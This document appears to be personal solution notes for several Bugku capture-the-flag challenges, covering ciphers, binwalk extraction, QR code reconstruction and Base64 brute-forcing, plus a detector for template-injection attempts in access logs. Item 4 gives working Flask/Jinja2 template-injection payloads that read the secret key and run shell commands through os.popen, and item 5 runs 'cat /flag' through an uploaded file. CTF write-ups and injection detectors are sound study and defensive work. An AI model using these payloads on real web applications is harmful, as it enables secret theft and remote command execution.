Bugku solution notes

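1. Rail fence cipher: CTF online tools - online rail fence cipher encryption | online rail fence cipher decryption | rail fence cipher algorithm | Railfence Cipher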

It is somewhat like a substitution cipher.

2. Online image recognition tools can identify the location shown in a picture.

3. The binwalk tool can be used to extract hidden files. The device information in the JPG file's properties turned out to be a hex string.

binwalk -e <file>

4. Flask template injection: flag={{config.SECRET_KEY}}

flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}} behaves like command execution; browse the directories to find app/flag.
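
A defensive complement to the two payloads above, as an added example that is not part of the original notes: a log scanner that flags query parameters carrying Jinja2 expressions, including percent-encoded and double-encoded ones. The log lines are constructed, and the function names and finding labels are illustrative assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?flag=hello HTTP/1.1" 200 120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?flag=%7B%7Bconfig.SECRET_KEY%7D%7D HTTP/1.1" 200 164',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /?flag=%7B%7Bconfig.__class__.__init__'
    '.__globals__%5B%27os%27%5D.popen(%27ls%20..%2F%27).read()%7D%7D HTTP/1.1" 200 310',
    '198.51.100.4 - - [01/Jan/2024:10:02:11 +0000] "GET /?flag=%257B%257Bconfig.SECRET_KEY%257D%257D HTTP/1.1" 200 164',
    '198.51.100.4 - - [01/Jan/2024:10:03:40 +0000] "GET /search?q=%7Bjson%7D HTTP/1.1" 200 98',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
EXPRESSION = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)  # {{ ... }} or {% ... %}
DUNDER = re.compile(r"__\w+__")    # __class__, __init__, __globals__, ...
CONFIG = re.compile(r"\bconfig\b")  # Flask's config object in the template context

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded braces are still seen."""
    for _ in range(max_rounds):
        value, previous = unquote_plus(value), value
        if value == previous:
            break
    return value

def classify(value):
    """Return a finding label for one parameter value, or None if it looks benign."""
    match = EXPRESSION.search(fully_decode(value))
    if not match:
        return None
    body = match.group(1) or match.group(2) or ""
    if DUNDER.search(body):
        return "dunder-traversal"
    if CONFIG.search(body):
        return "config-read"
    return "template-expression"

def scan_log(lines):
    """Return (line_number, parameter, label) for each suspicious query parameter."""
    findings = []
    for number, line in enumerate(lines, start=1):
        request = REQUEST.search(line)
        query = urlsplit(request.group(1)).query if request else ""
        for name, value in parse_qsl(query, keep_blank_values=True):
            label = classify(value)
            if label:
                findings.append((number, name, label))
    return findings
```

Calling scan_log(SAMPLE_LOG) reports lines 2, 3 and 4; the plain value and the single-brace value are not flagged.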

5. File upload: directly upload a JPG file that contains Python code; the flag appears in the hints in the page source (F12).

import os

os.system('cat /flag')

6. Building a QR code (reference: BugKu: The Story of 0 and 1 (writeup) - 哇哈爱吃糖's blog - CSDN blog)

from PIL import Image

with open("1和0的故事.txt", "r") as f:
    data = [list(i.strip()) for i in f.readlines()]

# 7x7 finder pattern
flag = [
    [1, 1, 1, 1, 1, 1, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 1, 1, 1, 1, 1, 1]
]

img = Image.new("1", (25, 25))
for i in range(len(data)):
    for j in range(len(data[1])):
        # top-left finder pattern
        if i < 7 and j < 7:
            img.putpixel((i, j), flag[i][j] ^ 1)
        # bottom-left finder pattern
        elif i > 17 and j < 7:
            img.putpixel((i, j), flag[i-18][j] ^ 1)
        # top-right finder pattern
        elif i < 7 and j > 17:
            img.putpixel((i, j), flag[i][j-18] ^ 1)
        else:
            img.putpixel((i, j), int(data[i][j]) ^ 1)

img.resize((500, 500)).show()

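7. Miscopied characters

Below is a small program I wrote. Running it performs the Base64 decoding and prints the candidate characters, which are then pieced together. The string is decoded in groups of 4 characters, with the groups separated by divider lines.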

import base64
import math

corpt = "QWIHBLGZZXJSXZNVBZW"


# Helper: every pairwise combination of one item from each list, joined as a string
def twoTo(list1, list2):
    result = []
    for i in list1:
        for j in list2:
            result.append(str(i) + str(j))
    return result


# Number of 4-character Base64 groups
length = math.ceil(len(corpt) / 4)
lcorpt = []
# Split the string into groups of 4
for i in range(length):
    lcorpt.append(corpt[i*4:i*4+4])

# Pad the last group with "="
if len(lcorpt[-1]) == 1:
    lcorpt[-1] = lcorpt[-1] + "=" * 3
elif len(lcorpt[-1]) == 2:
    lcorpt[-1] = lcorpt[-1] + "=" * 2
elif len(lcorpt[-1]) == 3:
    lcorpt[-1] = lcorpt[-1] + "=" * 1
else:
    print("perfect")

# Candidates for each copied character: upper case, lower case, and a look-alike digit
lalp = {"A": ["A", "a"], "B": ["B", "b"], "C": ["C", "c"], "D": ["D", "d"], "E": ["E", "e"],
        "F": ["F", "f"], "G": ["G", "g", 9], "H": ["H", "h"], "I": ["I", "i", 1], "J": ["J", "j"],
        "K": ["K", "k"], "L": ["L", "l"], "M": ["M", "m"], "N": ["N", "n"], "O": ["O", "o", 0],
        "P": ["P", "p"], "Q": ["Q", "q", 9], "R": ["R", "r"], "S": ["S", "s", 5], "T": ["T", "t"],
        "U": ["U", "u"], "V": ["V", "v"], "W": ["W", "w"], "X": ["X", "x"], "Y": ["Y", "y"],
        "Z": ["Z", "z", 2], "=": "="}

# Loop over the 4-character groups
for i in lcorpt:
    # Divider line between groups
    print("====================")
    # Candidates for the first two and the last two characters of the group
    fistli = twoTo(lalp[i[0]], lalp[i[1]])
    secondli = twoTo(lalp[i[2]], lalp[i[3]])

    # Pair the first-half candidates with the second-half candidates
    for k in fistli:
        for m in secondli:
            try:
                flag = base64.urlsafe_b64decode(k + m).decode("utf-8")
                print(flag)
            except Exception:
                # This combination is not valid Base64 or not valid UTF-8
                print("")

